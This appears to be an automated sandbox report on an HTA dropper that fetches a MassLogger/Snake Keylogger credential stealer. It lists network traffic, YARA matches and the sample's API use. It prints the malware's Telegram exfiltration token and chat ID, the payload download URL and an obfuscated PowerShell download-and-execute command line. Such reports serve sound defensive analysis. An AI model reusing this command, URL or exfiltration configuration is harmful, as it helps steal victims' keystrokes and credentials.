Source: 00000007.00000002.2509390080.00000000024F1000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7598843355:AAHehybWWiULdkPS1RLFstdr4_yw-SdkoII", "Telegram Chatid": "7668947425"}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\csoss[1].exe | ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Roaming\csoss.exe | ReversingLabs: Detection: 83%
Source: needagoodplanforsuccesstogetbackbest.hta | Virustotal: Detection: 40%
Source: needagoodplanforsuccesstogetbackbest.hta | ReversingLabs: Detection: 27%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.9% probability

                    Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:49697 version: TLS 1.0
Source: Binary string: wntdll.pdbUGP | source: csoss.exe, 00000006.00000003.1394760413.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, csoss.exe, 00000006.00000003.1395803435.0000000003970000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: csoss.exe, 00000006.00000003.1394760413.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, csoss.exe, 00000006.00000003.1395803435.0000000003970000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: q:C:\Users\user\AppData\Local\Temp\43swuu3x\43swuu3x.pdb | source: powershell.exe, 00000003.00000002.1400376615.0000000004B4A000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Roaming\csoss.exe | Code function: 6_2_00D6445A GetFileAttributesW,FindFirstFileW,FindClose, 6_2_00D6445A
Source: C:\Users\user\AppData\Roaming\csoss.exe | Code function: 6_2_00D6C6D1 FindFirstFileW,FindClose, 6_2_00D6C6D1
Source: C:\Users\user\AppData\Roaming\csoss.exe | Code function: 6_2_00D6C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 6_2_00D6C75C
Source: C:\Users\user\AppData\Roaming\csoss.exe | Code function: 6_2_00D6EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 6_2_00D6EF95
Source: C:\Users\user\AppData\Roaming\csoss.exe | Code function: 6_2_00D6F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 6_2_00D6F0F2
Source: C:\Users\user\AppData\Roaming\csoss.exe | Code function: 6_2_00D6F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 6_2_00D6F3F3
Source: C:\Users\user\AppData\Roaming\csoss.exe | Code function: 6_2_00D637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 6_2_00D637EF
Source: C:\Users\user\AppData\Roaming\csoss.exe | Code function: 6_2_00D63B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 6_2_00D63B12
Source: C:\Users\user\AppData\Roaming\csoss.exe | Code function: 6_2_00D6BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 6_2_00D6BCBC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 00965782h 7_2_00965358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 009651B9h 7_2_00964F08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 00965782h 7_2_009656AF

                    Networking

Source: Network traffic | Suricata IDS: 2022050 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 : 23.95.235.28:80 -> 192.168.2.6:49695
Source: Network traffic | Suricata IDS: 2022051 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 : 23.95.235.28:80 -> 192.168.2.6:49695
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Date: Mon, 17 Mar 2025 00:19:04 GMT | Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 | Last-Modified: Thu, 13 Mar 2025 12:29:25 GMT | ETag: "ef800-6303878f4d6d6" | Accept-Ranges: bytes | Content-Length: 980992 | Keep-Alive: timeout=5, max=100 | Connection: Keep-Alive | Content-Type: application/x-msdownload | Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 36 1c ad cf 72 7d c3 9c 72 7d c3 9c 72 7d c3 9c 34 2c 22 9c 70 7d c3 9c ec dd 04 9c 73 7d c3 9c 7f 2f 1c 9c 41 7d c3 9c 7f 2f 23 9c c3 7d c3 9c 7f 2f 22 9c 47 7d c3 9c 7b 05 40 9c 7b 7d c3 9c 7b 05 50 9c 57 7d c3 9c 72 7d c2 9c 52 7f c3 9c 0f 04 29 9c 22 7d c3 9c 0f 04 1c 9c 73 7d c3 9c 7f 2f 18 9c 73 7d c3 9c 72 7d 54 9c 73 7d c3 9c 0f 04 1d 9c 73 7d c3 9c 52 69 63 68 72 7d c3 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 79 cf d2 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0c 00 00 de 08 00 00 16 06 00 00 00 00 00 cd 7d 02 00 00 10 00 00 00 f0 08 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 0f 00 00 04 00 00 b6 19 0f 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c a4 0b 00 7c 01 00 00 00 70 0c 00 00 6f 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0e 00 1c 71 00 00 c0 2b 09 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 48 0a 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 08 00 84 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 dc 08 00 00 10 00 00 00 de 08 
00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0e e1 02 00 00 f0 08 00 00 e2 02 00 00 e2 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 8f 00 00 00 e0 0b 00 00 52 00 00 00 c4 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 00 6f 02 00 00 70 0c 00 00 70 02 00 00 16 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 1c 71 00 00 00 e0 0e 00 00 72 00 00 00 86 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 104.21.48.1
Source: Joe Sandbox View | IP Address: 23.95.235.28
Source: Joe Sandbox View | ASN Name: AS-COLOCROSSINGUS
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: unknown | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: reallyfreegeoip.org
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49696 -> 158.101.44.242:80
Source: global traffic | HTTP traffic detected: GET /120/csoss.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: 23.95.235.28 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:49697 version: TLS 1.0
Source: unknown | TCP traffic detected without corresponding DNS query: 23.95.235.28 (50 identical entries in the report)
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_04487A38 URLDownloadToFileW,3_2_04487A38
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /120/csoss.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 23.95.235.28Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                    Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                    Source: powershell.exe, 00000003.00000002.1400376615.0000000004B4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.28/120/csoss.ex
                    Source: powershell.exe, 00000003.00000002.1400376615.0000000004B4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.28/120/csoss.exe
                    Source: powershell.exe, 00000003.00000002.1413448646.0000000007C72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.28/120/csoss.exeSs
                    Source: RegSvcs.exe, 00000007.00000002.2509390080.0000000002570000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                    Source: RegSvcs.exe, 00000007.00000002.2509390080.0000000002570000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.comd
                    Source: RegSvcs.exe, 00000007.00000002.2509390080.0000000002570000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2509390080.000000000255E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                    Source: RegSvcs.exe, 00000007.00000002.2509390080.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                    Source: RegSvcs.exe, 00000007.00000002.2509390080.0000000002570000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/d
                    Source: csoss.exe, 00000006.00000002.1398840168.0000000000EB0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2507916337.0000000000522000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                    Source: RegSvcs.exe, 00000007.00000002.2509390080.0000000002570000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.orgd
                    Source: powershell.exe, 00000003.00000002.1402259894.00000000056C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 00000003.00000002.1400376615.00000000047B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: RegSvcs.exe, 00000007.00000002.2509390080.000000000258D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                    Source: RegSvcs.exe, 00000007.00000002.2509390080.000000000258D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.orgd
                    Source: powershell.exe, 00000003.00000002.1400376615.00000000047B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                    Source: powershell.exe, 00000003.00000002.1400376615.0000000004661000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2509390080.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000003.00000002.1400376615.00000000047B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                    Source: powershell.exe, 00000003.00000002.1400376615.00000000047B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: powershell.exe, 00000003.00000002.1400376615.0000000004661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                    Source: powershell.exe, 00000003.00000002.1400376615.00000000047B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                    Source: csoss.exe, 00000006.00000002.1398840168.0000000000EB0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2507916337.0000000000522000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
                    Source: powershell.exe, 00000003.00000002.1402259894.00000000056C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000003.00000002.1402259894.00000000056C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000003.00000002.1402259894.00000000056C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: powershell.exe, 00000003.00000002.1400376615.00000000047B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 00000003.00000002.1399303841.00000000005E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com64/WindowsPowerShell/v1.0/Author=
                    Source: powershell.exe, 00000003.00000002.1402259894.00000000056C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: RegSvcs.exe, 00000007.00000002.2509390080.0000000002570000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                    Source: csoss.exe, 00000006.00000002.1398840168.0000000000EB0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2507916337.0000000000522000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2509390080.0000000002570000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                    Source: RegSvcs.exe, 00000007.00000002.2509390080.0000000002570000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189d
                    Source: RegSvcs.exe, 00000007.00000002.2509390080.0000000002570000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189l
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    Source: 6.2.csoss.exe.eb0000.1.raw.unpack, UltraSpeed.cs.Net Code: VKCodeToUnicode
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D74164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,6_2_00D74164
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D73F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,6_2_00D73F66
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D6001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,6_2_00D6001C
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D8CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,6_2_00D8CABC

                    System Summary

                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwErsHeLl.exe -eX bYPasS -NOP -w 1 -C DEVICEcrEDeNtIaLDePLoyMEnt ; iEx($(IEX('[SYstEM.TEXT.encOdInG]'+[ChaR]0x3a+[CHAR]0X3A+'UtF8.geTsTRinG([SyStEm.ConVert]'+[cHAr]0x3a+[ChaR]58+'frOmBAsE64striNg('+[CHar]34+'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'+[cHar]0x22+'))')))"
                    Source: 6.2.csoss.exe.eb0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 6.2.csoss.exe.eb0000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 6.2.csoss.exe.eb0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 6.2.csoss.exe.eb0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 7.2.RegSvcs.exe.520000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 7.2.RegSvcs.exe.520000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 00000007.00000002.2507916337.0000000000522000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000006.00000002.1398840168.0000000000EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000006.00000002.1398840168.0000000000EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: Process Memory Space: csoss.exe PID: 6740, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: RegSvcs.exe PID: 5484, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: This is a third-party compiled AutoIt script.6_2_00D03B3A
                    Source: csoss.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                    Source: csoss.exe, 00000006.00000000.1384714838.0000000000DB4000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_4883ed55-9
                    Source: csoss.exe, 00000006.00000000.1384714838.0000000000DB4000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_7be239e3-2
                    Source: csoss.exe.3.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_e5ab769a-0
                    Source: csoss.exe.3.drString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_9346a01c-f
                    Source: csoss[1].exe.3.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_0f8192c1-a
                    Source: csoss[1].exe.3.drString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_b4cbe7a6-e
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\csoss.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\csoss[1].exe
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D6A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,6_2_00D6A1EF
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D58310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,6_2_00D58310
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D651BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,6_2_00D651BD
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D0E6A06_2_00D0E6A0
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D2D9756_2_00D2D975
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D0FCE06_2_00D0FCE0
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D221C56_2_00D221C5
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D362D26_2_00D362D2
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D803DA6_2_00D803DA
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D3242E6_2_00D3242E
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D225FA6_2_00D225FA
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D166E16_2_00D166E1
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D5E6166_2_00D5E616
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D3878F6_2_00D3878F
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D688896_2_00D68889
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D808576_2_00D80857
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D368446_2_00D36844
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D188086_2_00D18808
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D2CB216_2_00D2CB21
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D36DB66_2_00D36DB6
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D16F9E6_2_00D16F9E
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D130306_2_00D13030
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D2F1D96_2_00D2F1D9
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D231876_2_00D23187
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D012876_2_00D01287
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D214846_2_00D21484
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D155206_2_00D15520
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D276966_2_00D27696
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D157606_2_00D15760
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D219786_2_00D21978
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D39AB56_2_00D39AB5
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D87DDB6_2_00D87DDB
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D21D906_2_00D21D90
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D2BDA66_2_00D2BDA6
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D13FE06_2_00D13FE0
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D0DF006_2_00D0DF00
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00FE38B86_2_00FE38B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0096C1687_2_0096C168
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0096A7F27_2_0096A7F2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0096CA587_2_0096CA58
